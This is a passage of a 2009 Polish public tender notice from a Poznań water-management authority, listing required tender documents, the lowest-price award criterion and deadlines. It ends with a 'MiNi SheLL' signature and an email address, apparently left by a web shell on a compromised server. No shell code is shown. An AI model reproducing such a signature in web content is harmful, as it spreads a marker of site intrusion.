1.7.5.	Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym art. 24 ust. 1 pkt. 4 do 8 ustawy  tj. na temat karalności oferenta, a w przypadku gdy oferent jest osobą prawną, informacje powinny dotyczyć urzędujących członków władz, wydana nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (składa także każdy podmiot z osobna, gdy występują wspólnie);
1.7.6.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym art. 24 ust. 1 pkt. 9 ustawy (podmioty zbiorowe), wydana nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. (składa także każdy podmiot z osobna, gdy występują wspólnie);
1.7.7.	Aktualną polisę lub inny dokument ubezpieczenia oferenta od odpowiedzialności cywilnej /OC/ w zakresie prowadzonej działalności gospodarczej (składa także każdy podmiot z osobna, gdy występują wspólnie).
1.8.	Wykonawcy występujący  wspólnie muszą dołączyć dokument, w którym usta?nawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców.  Wykonawcy działający wspólnie ponoszą solidarną odpowiedzialność za wykonanie lub nienależyte wykonanie zamówienia.
1.9.	wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz 
1.9.1.	załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie (referencje);
1.10.	wykazu osób (na Formularzu oferty), którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz dokumenty:
1.10.1.	stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
1.10.2.	dyplomy, 
1.10.3.	potwierdzenie wpisu na listę członków Izby Inżynierów Budownictwa, 
1.10.4.	pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, wykonawca wskazał osoby, którymi będzie dysponował;
1.11.	Informacji banku, w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzającej wysokość	 posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości co najmniej 50.000,00 zł., wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
1.12.	Dokumenty potwierdzające spełnienie warunków wykonania zamówienia:  
	KOSZTORYS OFERTOWY jako sporządzony zgodnie z opisem sposobu obliczania ceny oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wzmiuw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznanoi, 60-967 Poznań, ul. Piekary 17 pok.105..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2009 godzina 09:30, miejsce: Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznaniu, 60-967 Poznań, ul. Piekary 17  - sekretariat - pok. 201..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com